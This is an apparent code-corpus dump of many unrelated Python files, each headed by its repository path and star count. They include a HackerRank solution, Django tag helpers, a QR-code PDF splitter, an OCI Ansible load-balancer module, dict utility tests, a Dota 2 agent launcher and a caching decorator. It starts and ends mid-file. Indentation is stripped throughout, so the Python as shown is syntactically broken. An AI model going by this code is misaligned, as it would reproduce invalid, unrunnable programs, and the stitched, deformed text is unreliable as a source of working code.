# reset index
self.idx = 0
def end(self):
self.print('\n')
def flush(self):
if self.size is None:
done = self.idx * self.batch
percent = 0
bar = None
else:
done = min(self.idx * self.batch, self.size)
percent = done / self.size
bar = (self.SYMBOL_DONE * int(percent * self.BAR_LENGTH)).ljust(self.BAR_LENGTH, self.SYMBOL_REST)
self.print('\r' + self.template.format(
percent = percent * 100,
bar = bar,
done = done,
size = self.size,
time = self.time,
tps = done / self.time,
prefix = self.prefix,
suffix = self.suffix,
))
def print(self, text):
sys.stdout.write(text)
sys.stdout.flush()
|
hacker-rank/algorithms/strings/two-strings/two-strings.py
|
palash24/algorithms
| 113 |
75478
|
<reponame>palash24/algorithms<gh_stars>100-1000
#!/usr/bin/env python
import sys
def char_set(string):
chars = {}
for c in string:
chars[c] = True
return chars
def test_case():
A = sys.stdin.readline().strip()
B = sys.stdin.readline().strip()
bCharSet = char_set(B)
for c in A:
if (c in bCharSet):
print("YES")
return
print("NO")
def main():
T = int(sys.stdin.readline())
while (T > 0):
test_case()
T -= 1
if __name__ == '__main__':
main()
|
virtual/lib/python3.8/site-packages/django_bootstrap5/html.py
|
Calebu6214/Instagram-clone
| 118 |
75494
|
<reponame>Calebu6214/Instagram-clone
from django.forms.utils import flatatt
from django.utils.html import format_html
from django_bootstrap5.text import text_value
from django_bootstrap5.utils import get_url_attrs
def render_script_tag(url):
"""Build a script tag."""
return render_tag("script", get_url_attrs(url, attr_name="src"))
def render_link_tag(url):
"""Build a link tag."""
attrs = get_url_attrs(url, attr_name="href")
attrs["rel"] = "stylesheet"
return render_tag("link", attrs=attrs, close=False)
def render_tag(tag, attrs=None, content=None, close=True):
"""Render an HTML tag."""
attrs_string = flatatt(attrs) if attrs else ""
builder = "<{tag}{attrs}>{content}"
content_string = text_value(content)
if content_string or close:
builder += "</{tag}>"
return format_html(builder, tag=tag, attrs=attrs_string, content=content_string)
|
src/visitpy/visit_flow/visit_flow_vpe/examples/flow_vpe_pyocl_compile_dw_mag.py
|
visit-dav/vis
| 226 |
75496
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: vpe_flow_npy_ops_example_1.py
author: <NAME> <<EMAIL>>
created: 3/28/2012
description:
vpe flow example demonstrating use of flow.filters.npy_ops.
"""
from flow import *
from flow.filters import pyocl_compile
def setup_workspace():
w = Workspace()
w.register_filters(pyocl_compile)
ctx = w.add_context("pyocl_compile","root")
ctx.start()
ctx.add_filter("decompose","dwdx",{"index":0})
ctx.add_filter("decompose","dwdy",{"index":1})
ctx.add_filter("decompose","dwdz",{"index":2})
ctx.add_filter("grad","dw")
ctx.add_filter("mult","vx_sq")
ctx.add_filter("mult","vy_sq")
ctx.add_filter("mult","vz_sq")
ctx.add_filter("add","v_add_1")
ctx.add_filter("add","v_add")
ctx.add_filter("sqrt","v_sqrt")
ctx.connect(":vz","dw:in")
ctx.connect(":dims","dw:dims")
ctx.connect(":x","dw:x")
ctx.connect(":y","dw:y")
ctx.connect(":z","dw:z")
ctx.connect("dw","dwdx:in")
ctx.connect("dw","dwdy:in")
ctx.connect("dw","dwdz:in")
ctx.connect("dwdx","vx_sq:in_a")
ctx.connect("dwdx","vx_sq:in_b")
ctx.connect("dwdy","vy_sq:in_a")
ctx.connect("dwdy","vy_sq:in_b")
ctx.connect("dwdz","vz_sq:in_a")
ctx.connect("dwdz","vz_sq:in_b")
ctx.connect("vx_sq","v_add_1:in_a")
ctx.connect("vy_sq","v_add_1:in_b")
ctx.connect("v_add_1","v_add:in_a")
ctx.connect("vz_sq","v_add:in_b")
ctx.connect("v_add","v_sqrt:in")
return w
|
skift/__init__.py
|
dimidd/skift
| 244 |
75502
|
<reponame>dimidd/skift
"""Utilities for pandas."""
from .core import FirstColFtClassifier # noqa: F401
from .core import IdxBasedFtClassifier # noqa: F401
from .core import FirstObjFtClassifier # noqa: F401
from .core import ColLblBasedFtClassifier # noqa: F401
from .core import SeriesFtClassifier # noqa: F401
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
for name in ['get_versions', '_version', 'core', 'name']:
try:
globals().pop(name)
except KeyError:
pass
|
sbin/submitty_daemon_jobs/submitty_jobs/bulk_qr_split.py
|
zeez2030/Submitty
| 411 |
75505
|
#!/usr/bin/env python3
"""Split PDFs by QR code and move images and PDFs to the correct folder."""
import os
import traceback
import numpy
from . import write_to_log as logger
from . import submitty_ocr as scanner
# try importing required modules
try:
from PyPDF2 import PdfFileReader, PdfFileWriter
from pdf2image import convert_from_bytes
import pyzbar.pyzbar as pyzbar
from pyzbar.pyzbar import ZBarSymbol
import cv2
except ImportError:
traceback.print_exc()
raise ImportError("One or more required python modules not installed correctly")
def main(args):
"""Scan through PDF and split PDF and images."""
filename = args[0]
split_path = args[1]
qr_prefix = args[2]
qr_suffix = args[3]
log_file_path = args[4]
use_ocr = args[5]
buff = "Process " + str(os.getpid()) + ": "
try:
os.chdir(split_path)
pdfPages = PdfFileReader(filename)
pdf_writer = PdfFileWriter()
i = id_index = 0
page_count = 1
prev_file = data = "BLANK"
output = {"filename": filename, "is_qr": True, "use_ocr": use_ocr}
json_file = os.path.join(split_path, "decoded.json")
for page_number in range(pdfPages.numPages):
# convert pdf to series of images for scanning
page = convert_from_bytes(
open(filename, 'rb').read(),
first_page=page_number+1, last_page=page_number+2)[0]
# increase contrast of image for better QR decoding
cv_img = numpy.array(page)
img_grey = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)
ret2, thresh = cv2.threshold(img_grey, 0, 255,
cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# decode img - only look for QR codes
val = pyzbar.decode(thresh, symbols=[ZBarSymbol.QRCODE])
if val != []:
# found a new qr code, split here
# convert byte literal to string
data = val[0][0].decode("utf-8")
if not use_ocr:
buff += "Found a QR code with value \'" + data + "\' on"
buff += " page " + str(page_number) + ", "
if data == "none": # blank exam with 'none' qr code
data = "BLANK EXAM"
else:
pre = data[0:len(qr_prefix)]
suf = data[(len(data)-len(qr_suffix)):len(data)]
if qr_prefix != '' and pre == qr_prefix:
data = data[len(qr_prefix):]
if qr_suffix != '' and suf == qr_suffix:
data = data[:-len(qr_suffix)]
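                        # Illustrative example (prefix/suffix values assumed):
                        # with qr_prefix='exam_' and qr_suffix='_v1', a decoded
                        # value 'exam_smith123_v1' is reduced to 'smith123'.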
# since QR splitting doesn't know the max page assume length of 3
prepended_index = str(i).zfill(3)
cover_filename = '{}_{}_cover.pdf'.format(filename[:-4],
prepended_index)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
output[output_filename] = {}
# if we're looking for a student's ID, use that as the value instead
if use_ocr:
data, confidences = scanner.getDigits(thresh, val)
buff += "Found student ID number of \'" + data + "\' on"
buff += " page " + str(page_number) + ", "
buff += "Confidences: " + str(confidences) + " "
output[output_filename]["confidences"] = str(confidences)
output[output_filename]['id'] = data
# save pdf
if i != 0 and prev_file != '':
output[prev_file]['page_count'] = page_count
# update json file
logger.write_to_json(json_file, output)
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
if id_index == 1:
# correct first pdf's page count and print file
output[prev_file]['page_count'] = page_count
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
# start a new pdf and grab the cover
cover_writer = PdfFileWriter()
pdf_writer = PdfFileWriter()
cover_writer.addPage(pdfPages.getPage(i))
pdf_writer.addPage(pdfPages.getPage(i))
# save cover
with open(cover_filename, 'wb') as out:
cover_writer.write(out)
# save cover image
page.save('{}.jpg'.format(cover_filename[:-4]), "JPEG", quality=100)
id_index += 1
page_count = 1
prev_file = output_filename
# save page as image, start indexing at 1
page.save(prev_file[:-4] + '_' + str(page_count).zfill(3) + '.jpg',
"JPEG", quality=100)
else:
# the first pdf page doesn't have a qr code
if i == 0:
prepended_index = str(i).zfill(3)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
cover_filename = '{}_{}_cover.pdf'.format(filename[:-4],
prepended_index)
output[output_filename] = {}
# set the value as blank so a human can check what happened
output[output_filename]['id'] = "BLANK"
prev_file = output_filename
id_index += 1
cover_writer = PdfFileWriter()
# save cover
cover_writer.addPage(pdfPages.getPage(i))
with open(cover_filename, 'wb') as out:
cover_writer.write(out)
# save cover image
page.save('{}.jpg'.format(cover_filename[:-4]), "JPEG", quality=100)
# add pages to current split_pdf
page_count += 1
pdf_writer.addPage(pdfPages.getPage(i))
# save page as image, start indexing at 1
page.save(prev_file[:-4] + '_' + str(page_count).zfill(3) + '.jpg',
"JPEG", quality=100)
i += 1
buff += "Finished splitting into {} files\n".format(id_index)
# save whatever is left
prepended_index = str(i).zfill(3)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
output[prev_file]['id'] = data
output[prev_file]['page_count'] = page_count
if use_ocr:
output[prev_file]['confidences'] = str(confidences)
logger.write_to_json(json_file, output)
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
# write the buffer to the log file, so everything is on one line
logger.write_to_log(log_file_path, buff)
except Exception:
msg = "Failed when splitting pdf " + filename
print(msg)
traceback.print_exc()
# print everything in the buffer just in case it didn't write
logger.write_to_log(log_file_path, buff)
logger.write_to_log(log_file_path, msg + "\n" + traceback.format_exc())
if __name__ == "__main__":
    # forward the command-line arguments, since main() expects them as a list
    import sys
    main(sys.argv[1:])
|
tests/clpy_tests/random_tests/test_distributions.py
|
fixstars/clpy
| 142 |
75518
|
<filename>tests/clpy_tests/random_tests/test_distributions.py
import unittest
import clpy
from clpy.random import distributions
from clpy import testing
@testing.parameterize(*testing.product({
'shape': [(4, 3, 2), (3, 2)],
'loc_shape': [(), (3, 2)],
'scale_shape': [(), (3, 2)],
})
)
@testing.gpu
class TestDistributions(unittest.TestCase):
_multiprocess_can_split_ = True
def check_distribution(self, dist_func, loc_dtype, scale_dtype, dtype):
loc = clpy.ones(self.loc_shape, dtype=loc_dtype)
scale = clpy.ones(self.scale_shape, dtype=scale_dtype)
out = dist_func(loc, scale, self.shape, dtype)
self.assertEqual(self.shape, out.shape)
self.assertEqual(out.dtype, dtype)
@clpy.testing.for_float_dtypes('dtype', no_float16=True)
@clpy.testing.for_float_dtypes('loc_dtype')
@clpy.testing.for_float_dtypes('scale_dtype')
def test_normal(self, loc_dtype, scale_dtype, dtype):
self.check_distribution(distributions.normal,
loc_dtype, scale_dtype, dtype)
|
test/Driver/Dependencies/Inputs/fake-build-for-bitcode.py
|
AbdouSarr/swift
| 825 |
75523
|
#!/usr/bin/env python
# fake-build-for-bitcode.py - Fake build with -embed-bitcode -*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
#
# Emulates the frontend of an -embed-bitcode job. That means we have to handle
# -emit-bc and -c actions.
#
# ----------------------------------------------------------------------------
from __future__ import print_function
import os
import sys
assert sys.argv[1] == '-frontend'
primaryFile = sys.argv[sys.argv.index('-primary-file') + 1]
outputFile = sys.argv[sys.argv.index('-o') + 1]
# Update the output file mtime, or create it if necessary.
# From http://stackoverflow.com/a/1160227.
with open(outputFile, 'a'):
os.utime(outputFile, None)
if '-emit-bc' in sys.argv:
print("Handled", os.path.basename(primaryFile))
elif '-c' in sys.argv:
print("Produced", os.path.basename(outputFile))
else:
assert False, "unknown action"
|
library/oci_load_balancer_backend.py
|
slmjy/oci-ansible-modules
| 106 |
75527
|
#!/usr/bin/python
# Copyright (c) 2018, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_load_balancer_backend
short_description: Add, modify and remove a backend from a load balancer in
OCI Load Balancing Service
description:
- Add a Backend server to OCI Load Balancer
- Update a Backend server in a Load Balancer, if present, with any changed attribute
- Delete a Backend server from OCI Load Balancer Backends, if present.
version_added: "2.5"
options:
load_balancer_id:
description: Identifier of the Load Balancer in which the Backend belongs.
required: true
aliases: ['id']
backend_set_name:
description: The name of the backend set to add the backend server to.
required: true
ip_address:
description: The IP address of the backend server.
required: true
port:
description: The communication port for the backend server.
required: true
backup:
description: Whether the load balancer should treat this server as a backup unit. If true, the load balancer
forwards no ingress traffic to this backend server unless all other backend servers not marked as
"backup" fail the health check policy.
required: false
default: False
type: bool
drain:
description: Whether the load balancer should drain this server. Servers marked "drain" receive no new incoming
traffic.
required: false
default: False
type: bool
offline:
description: Whether the load balancer should treat this server as offline. Offline servers receive no incoming
traffic.
required: false
default: False
type: bool
state:
description: Create,update or delete Load Balancer Backend. For I(state=present),
if it does not exists, it gets added. If exists, it gets updated.
required: false
default: 'present'
choices: ['present','absent']
weight:
description: The load balancing policy weight assigned to the server. Backend
servers with a higher weight receive a larger proportion of incoming
traffic. For example, a server weighted 3 receives 3 times the number
of new connections as a server weighted 1.
required: false
author:
- "<NAME>(@debayan_gupta)"
extends_documentation_fragment: [oracle, oracle_wait_options]
"""
EXAMPLES = """
# Note: These examples do not set authentication details.
# Create Load Balancer Backend
- name: Create Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: False
drain: False
offline: False
weight: 3
state: 'present'
# Update a Backend server by enabling drain
- name: Drain a backend server by updating the Backend and setting the 'drain' option
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
drain: True
state: 'present'
# Update a Backend server to make it offline
- name: Make a backend server offline
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
offline: True
state: 'present'
# Update a Backend server to backup state
- name: Change a backend server state as backup
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: True
state: 'present'
# Update Load Balancer Backend
- name: Update Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: True
state: 'present'
# Delete Load Balancer Backend
- name: Update Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
state: 'absent'
"""
RETURN = """
backend:
description: Attributes of the created/updated Load Balancer Backend.
For delete, deleted Load Balancer Backend description will
be returned.
returned: success
type: complex
contains:
name:
description: Name of the Load Balancer Backend
returned: always
type: string
sample: 10.45.121.59:8080
ip_address:
description: Ip Address of the Load Balancer Backend
returned: always
type: string
sample: 10.45.121.69
port:
description: Port of the Load Balancer Backend
returned: always
type: string
sample: 8080
backup:
description: The backup state of the Load Balancer Backend
returned: always
type: boolean
sample: False
drain:
description: The drain state of the Load Balancer Backend
returned: always
type: boolean
sample: False
offline:
description: The offline state of the Load Balancer Backend
returned: always
type: boolean
sample: False
weight:
description: The weight of the Load Balancer Backend
returned: always
type: integer
sample: 1
sample: {
"backup": false,
"drain": false,
"ip_address": "10.159.34.21",
"name":"10.159.34.21:8181",
"offline":false,
"port":8181,
"weight":3
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oracle import oci_utils, oci_lb_utils
try:
from oci.load_balancer.load_balancer_client import LoadBalancerClient
from oci.exceptions import ServiceError, ClientError
from oci.util import to_dict
from oci.load_balancer.models import UpdateBackendDetails, CreateBackendDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
logger = None
def create_or_update_backend(lb_client, module):
backend = None
result = dict(changed=False, backend="")
lb_id = module.params.get("load_balancer_id")
backend_set_name = module.params.get("backend_set_name")
backend = oci_utils.get_existing_resource(
lb_client.get_backend,
module,
load_balancer_id=lb_id,
backend_set_name=backend_set_name,
backend_name=oci_lb_utils.get_backend_name(module),
)
try:
if backend:
result = update_backend(lb_client, module, backend, lb_id, backend_set_name)
else:
result = oci_utils.check_and_create_resource(
resource_type="backend",
create_fn=create_backend,
kwargs_create={
"lb_client": lb_client,
"module": module,
"lb_id": lb_id,
"backend_set_name": backend_set_name,
},
list_fn=lb_client.list_backends,
kwargs_list={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
},
module=module,
model=CreateBackendDetails(),
)
except ServiceError as ex:
get_logger().error("Unable to create/update backend due to: %s", ex.message)
module.fail_json(msg=ex.message)
except ClientError as ex:
get_logger().error("Unable to create/update backend due to: %s", str(ex))
module.fail_json(msg=str(ex))
return result
def create_backend(lb_client, module, lb_id, backend_set_name):
backend_name = oci_lb_utils.get_backend_name(module)
create_backend_details = CreateBackendDetails()
for attribute in create_backend_details.attribute_map:
create_backend_details.__setattr__(
attribute, module.params.get(attribute, None)
)
get_logger().info(
"Creating backend for backendset %s with parameters %s",
backend_set_name,
str(create_backend_details),
)
get_logger().debug(
"backend ip_address: %s and port: %s",
module.params["ip_address"],
str(module.params["port"]),
)
result = oci_lb_utils.create_or_update_lb_resources_and_wait(
resource_type="backend",
function=lb_client.create_backend,
kwargs_function={
"create_backend_details": create_backend_details,
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully created backend for backendset %s with parameters %s",
backend_set_name,
str(create_backend_details),
)
return result
def update_backend(lb_client, module, backend, lb_id, backend_set_name):
changed = False
result = dict(changed=changed, backend=to_dict(backend))
backend_name = oci_lb_utils.get_backend_name(module)
get_logger().info(
"Updating backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
update_backend_details = UpdateBackendDetails()
for attribute in update_backend_details.attribute_map:
changed = oci_utils.check_and_update_attributes(
update_backend_details,
attribute,
module.params.get(attribute, None),
getattr(backend, attribute),
changed,
)
get_logger().debug(
"Existing backend property values: %s, input property values: %s",
backend,
update_backend_details,
)
if changed:
result = oci_lb_utils.create_or_update_lb_resources_and_wait(
resource_type="backend",
function=lb_client.update_backend,
kwargs_function={
"update_backend_details": update_backend_details,
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully updated backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
else:
get_logger().info(
"No update to the backend %s for backendset %s in load balancer %s as no "
+ "attribute changed",
backend_name,
backend_set_name,
lb_id,
)
return result
def delete_backend(lb_client, module):
lb_id = module.params.get("load_balancer_id")
backend_set_name = module.params.get("backend_set_name")
backend_name = oci_lb_utils.get_backend_name(module)
get_logger().info(
"Deleting backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
result = oci_lb_utils.delete_lb_resources_and_wait(
resource_type="backend",
function=lb_client.delete_backend,
kwargs_function={
"backend_set_name": backend_set_name,
"load_balancer_id": lb_id,
"backend_name": backend_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully Deleted backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
return result
def set_logger(input_logger):
global logger
logger = input_logger
def get_logger():
return logger
def main():
logger = oci_utils.get_logger("oci_load_balancer_backend")
set_logger(logger)
module_args = oci_utils.get_common_arg_spec(supports_wait=True)
module_args.update(
dict(
load_balancer_id=dict(type="str", required=True, aliases=["id"]),
backend_set_name=dict(type="str", required=True),
backup=dict(type="bool", required=False),
ip_address=dict(type="str", required=True),
drain=dict(type="bool", required=False),
state=dict(
type="str",
required=False,
default="present",
choices=["present", "absent"],
),
offline=dict(type="bool", required=False),
port=dict(type="int", required=True),
weight=dict(type="int", required=False),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module")
lb_client = oci_utils.create_service_client(module, LoadBalancerClient)
state = module.params["state"]
if state == "present":
result = create_or_update_backend(lb_client, module)
elif state == "absent":
result = delete_backend(lb_client, module)
module.exit_json(**result)
if __name__ == "__main__":
main()
|
heat/db/sqlalchemy/migrate_repo/versions/080_resource_attrs_data.py
|
noironetworks/heat
| 265 |
75543
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate.changeset import constraint
import sqlalchemy
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
resource = sqlalchemy.Table('resource', meta, autoload=True)
resource_properties_data = sqlalchemy.Table('resource_properties_data',
meta, autoload=True)
attr_data_id = sqlalchemy.Column('attr_data_id',
sqlalchemy.Integer)
attr_data_id.create(resource)
res_fkey = constraint.ForeignKeyConstraint(
columns=[resource.c.attr_data_id],
refcolumns=[resource_properties_data.c.id],
name='rsrc_attr_data_ref')
res_fkey.create()
|
tests/test_dict.py
|
fakegit/pydu
| 229 |
75545
|
import pytest
import unittest
from pydu.dict import AttrDict, LookupDict, CaseInsensitiveDict, OrderedDefaultDict, attrify
class TestAttrDict:
def test_attr_access_with_init(self):
d = AttrDict(key=1)
assert d['key'] == 1
assert d.key == 1
def test_attr_access_without_init(self):
d = AttrDict()
d['key'] = 1
assert d['key'] == 1
assert d.key == 1
d.anotherkey = 1
assert d.anotherkey == 1
assert d['anotherkey'] == 1
def test_attr_delete(self):
d = AttrDict(key=1)
del d.key
with pytest.raises(AttributeError):
del d.key
def test_repr(self):
d = AttrDict()
assert repr(d) == '<AttrDict {}>'
class TestLooUpDict:
def test_key_exist(self):
d = LookupDict()
d['key'] = 1
assert d['key'] == 1
def test_key_not_exist(self):
d = LookupDict()
assert d['key'] is None
class TestCaseInsensitiveDict(unittest.TestCase):
def setUp(self):
self.d = CaseInsensitiveDict()
self.d['Accept'] = 1
def test_ci_dict_set(self):
assert self.d['aCCept'] == 1
assert list(self.d) == ['Accept']
def test_ci_dict_del(self):
del self.d['accept']
assert not self.d
def test_ci_dict_copy_and_equal(self):
d = self.d.copy()
assert d == self.d
class TestOrderedDefaultDict:
def test_default_normal(self):
d = OrderedDefaultDict(int)
assert d[1] == 0
assert d['a'] == 0
d[2] = 2
assert d[2] == 2
assert list(d.keys()) == [1, 'a', 2]
d = OrderedDefaultDict(int, a=1)
assert d['a'] == 1
def test_default_factory_not_callable(self):
with pytest.raises(TypeError):
OrderedDefaultDict('notcallable')
def test_default_factory_none(self):
d = OrderedDefaultDict()
with pytest.raises(KeyError):
d[1]
def test_copy(self):
d1 = OrderedDefaultDict(int, a=[])
d2 = d1.copy()
assert d2['a'] == []
d1['a'].append(1)
assert d2['a'] == [1]
def test_deepcopy(self):
import copy
d1 = OrderedDefaultDict(int, a=[])
d2 = copy.deepcopy(d1)
assert d2['a'] == []
d1['a'].append(1)
assert d2['a'] == []
def test_repr(self):
d = OrderedDefaultDict(int, a=1)
assert repr(d).startswith('OrderedDefaultDict')
def test_attrify():
attrd = attrify({
'a': [1, 2, {'b': 'b'}],
'c': 'c',
})
assert attrd.a == [1, 2, {'b': 'b'}]
assert attrd.a[2].b == 'b'
assert attrd.c == 'c'
attrd = attrify((1, 2))
assert attrd == (1, 2)
attrd = attrify({
'a': 1,
'b': (1, 2)
})
assert attrd.a == 1
assert attrd.b == (1, 2)
|
play_with_human_local.py
|
Andrea-MariaDB-2/LastOrder-Dota2
| 332 |
75549
|
<gh_stars>100-1000
from gym_env.dota_game import DotaGame, TEAM_RADIANT, TEAM_DIRE
from dotaservice.protos.dota_shared_enums_pb2 import DOTA_GAMEMODE_1V1MID
from agents.dota_agent import PPOAgent
from multiprocessing import Process
from sys import platform
import time
import os
import pathlib
# path example
DOTA_CLINET_PATH_MAC = "~/Library/Application Support/Steam/steamapps/common/dota 2 beta/game"
DOTA_CLINET_PATH_WINDOWS = r'E:\SteamLibrary\steamapps\common\dota 2 beta\game'
DOTA_CLINET_PATH_LINUX = "~/.steam/steam/steamapps/common/dota 2 beta/game"
TMP_PATH_WINDOWS = str(pathlib.Path(__file__).parent.resolve()) + r'\tmp'
LAST_ORDER_PROJECT_PATH_MAC = pathlib.Path(__file__).parent.resolve()
LAST_ORDER_PROJECT_PATH_WINDOWS = pathlib.Path(__file__).parent.resolve()
LAST_ORDER_PROJECT_PATH_LINUX = pathlib.Path(__file__).parent.resolve()
print(LAST_ORDER_PROJECT_PATH_WINDOWS)
def dota_process_exists():
if platform == 'win32':
return len(os.popen("tasklist /v | findstr dota2.exe").read()) != 0
else:
return len(os.popen("ps aux | grep dota2 | grep -v grep").read()) != 0
def run_human_vs_ai(dota_game: DotaGame, team_id: int, player_id: int, opponent_player_id: int):
if platform == 'darwin':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_MAC
elif platform == 'win32':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_WINDOWS
else:
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_LINUX
agent = PPOAgent(
dota_game,
team_id,
player_id,
opponent_player_id,
"",
"self_eval",
)
agent.run()
def run_dota():
dota_game = DotaGame(host_timescale=1, ticks_per_observation=6, game_mode=DOTA_GAMEMODE_1V1MID, host_mode="HOST_MODE_GUI_MENU")
if platform == 'darwin':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_MAC
elif platform == 'win32':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_WINDOWS
else:
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_LINUX
try:
dota_game.stop_dota_pids()
dota_game.run_dota()
time.sleep(10)
except Exception as e:
print(e)
dota_game.stop_dota_pids()
def supervisor():
while True:
if not dota_process_exists():
Process(target=run_dota).run()
dota_game = DotaGame(host_timescale=1, ticks_per_observation=6, game_mode=DOTA_GAMEMODE_1V1MID, host_mode="HOST_MODE_GUI_MENU")
dp = Process(target=run_human_vs_ai, args=(dota_game, TEAM_RADIANT, 1, 0))
dp.start()
time.sleep(20)
if __name__ == "__main__":
supervisor()
|
python_toolbox/caching/decorators.py
|
hboshnak/python_toolbox
| 119 |
75558
|
# Copyright 2009-2017 <NAME>.
# This program is distributed under the MIT license.
'''
Defines the `cache` decorator.
See its documentation for more details.
'''
# todo: examine thread-safety
import datetime as datetime_module
from python_toolbox import misc_tools
from python_toolbox import binary_search
from python_toolbox import decorator_tools
from python_toolbox.sleek_reffing import SleekCallArgs
from python_toolbox.third_party.decorator import decorator as decorator_
infinity = float('inf')
class CLEAR_ENTIRE_CACHE(misc_tools.NonInstantiable):
'''Sentinel object for clearing the entire cache.'''
def _get_now():
'''
Get the current datetime.
This is specified as a function to make testing easier.
'''
return datetime_module.datetime.now()
@decorator_tools.helpful_decorator_builder
def cache(max_size=infinity, time_to_keep=None):
'''
Cache a function, saving results so they won't have to be computed again.
This decorator understands function arguments. For example, it understands
that for a function like this:
@cache()
def f(a, b=2):
return whatever
The calls `f(1)` or `f(1, 2)` or `f(b=2, a=1)` are all identical, and a
cached result saved for one of these calls will be used for the others.
All the arguments are sleekreffed to prevent memory leaks. Sleekref is a
variation of weakref. Sleekref is when you try to weakref an object, but if
it's non-weakreffable, like a `list` or a `dict`, you maintain a normal,
strong reference to it. (See documentation of
`python_toolbox.sleek_reffing` for more details.) Thanks to sleekreffing
you can avoid memory leaks when using weakreffable arguments, but if you
ever want to use non-weakreffable arguments you are still able to.
(Assuming you don't mind the memory leaks.)
You may optionally specify a `max_size` for maximum number of cached
results to store; old entries are thrown away according to a
least-recently-used algorithm. (Often abbreviated LRU.)
You may optionally specify a `time_to_keep`, which is a time period after
which a cache entry will expire. (Pass in either a `timedelta` object or
keyword arguments to create one.)
'''
# todo idea: figure out how complex the function's argspec is, and then
# compile a function accordingly, so functions with a simple argspec won't
# have to go through so much overhead. update: probably it will help only for
# completely argumentless functions, so do one for those.
from python_toolbox.nifty_collections import OrderedDict
if time_to_keep is not None:
if max_size != infinity:
raise NotImplementedError
if not isinstance(time_to_keep, datetime_module.timedelta):
try:
time_to_keep = datetime_module.timedelta(**time_to_keep)
except Exception as exception:
raise TypeError(
'`time_to_keep` must be either a `timedelta` object or a '
'dict of keyword arguments for constructing a '
'`timedelta` object.'
) from exception
assert isinstance(time_to_keep, datetime_module.timedelta)
def decorator(function):
# In case we're being given a function that is already cached:
if getattr(function, 'is_cached', False): return function
if max_size == infinity:
if time_to_keep:
sorting_key_function = lambda sleek_call_args: \
cached._cache[sleek_call_args][1]
def remove_expired_entries():
almost_cutting_point = \
binary_search.binary_search_by_index(
list(cached._cache.keys()),
